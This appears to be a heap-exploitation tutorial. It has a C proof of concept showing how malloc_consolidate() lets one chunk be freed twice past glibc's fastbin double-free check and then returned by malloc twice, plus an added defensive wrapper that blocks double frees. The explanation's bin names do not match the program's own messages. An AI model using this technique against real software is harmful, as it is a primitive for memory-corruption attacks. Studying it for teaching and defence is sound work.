Source
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main() {
    void* p1 = malloc(0x40);
    void* p2 = malloc(0x40);
    fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);
    fprintf(stderr, "Now free p1!\n");
    free(p1);

    void* p3 = malloc(0x400);
    fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
    fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");
    free(p1);
    fprintf(stderr, "Trigger the double free vulnerability!\n");
    fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n");
    fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'll get it twice: %p %p\n", malloc(0x40), malloc(0x40));
    return 0;
}
Run result and checksec output (screenshots not reproduced here)
First allocate p1 and p2, each 0x40 bytes, so both chunks fall within the fastbin size range.
Then free p1.
Next allocate p3 with 0x400 bytes; a request of this size belongs to the small bin and triggers malloc_consolidate().
malloc_consolidate() moves p1 out of the fastbin and into the small bin (the program's own message describes it as the unsorted bin).
At this point p1 is no longer the head of the fastbin,
so it can be freed a second time: the double-free check is passed because p1 is not the fastbin top.
After the second free,
p1 sits in both the fastbin and the small bin.
Two further malloc(0x40) calls therefore both return p1's memory.
From the debugging figure it can be seen that the first allocation takes p1 from the fastbin and the second takes p1 from the small bin.
This is the resulting double free.
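The check that the demo slips past only compares the freed chunk with the current fastbin top. As an added example (not glibc code and not part of the original write-up), the wrapper below tracks live pointers itself and blocks a second free of the same pointer regardless of bin state; `tracked_malloc`, `tracked_free` and `replay_consolidate_sequence` are names chosen here, and the replay follows the same sequence as the page's program.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed debug allocator: remembers every pointer handed out and refuses
   to free one that is not currently live. Unlike glibc's fastbin check, it does
   not care whether the chunk is at the fastbin top. */
#define MAX_TRACKED 64

static void *live[MAX_TRACKED];   /* pointers currently allocated */
static int live_count = 0;
static int double_free_count = 0; /* double frees caught so far */

void *tracked_malloc(size_t n) {
    void *p = malloc(n);
    if (p && live_count < MAX_TRACKED) live[live_count++] = p;
    return p;
}

/* Returns 1 if the free was legitimate, 0 if it was a double free (blocked). */
int tracked_free(void *p) {
    for (int i = 0; i < live_count; i++) {
        if (live[i] == p) {
            live[i] = live[--live_count];  /* drop p from the live set */
            free(p);
            return 1;
        }
    }
    double_free_count++;
    fprintf(stderr, "tracked_free: double free of %p blocked\n", p);
    return 0;
}

int tracked_double_free_count(void) { return double_free_count; }

/* Replays the page's allocation sequence through the wrapper and returns the
   number of double frees caught along the way (1 for this sequence). */
int replay_consolidate_sequence(void) {
    void *p1 = tracked_malloc(0x40);
    void *p2 = tracked_malloc(0x40);
    tracked_free(p1);                    /* first, legitimate free */
    void *p3 = tracked_malloc(0x400);    /* would trigger malloc_consolidate() */
    int second = tracked_free(p1);       /* second free of p1: blocked here */
    tracked_free(p2);
    tracked_free(p3);
    return second == 0 ? 1 : 0;
}
```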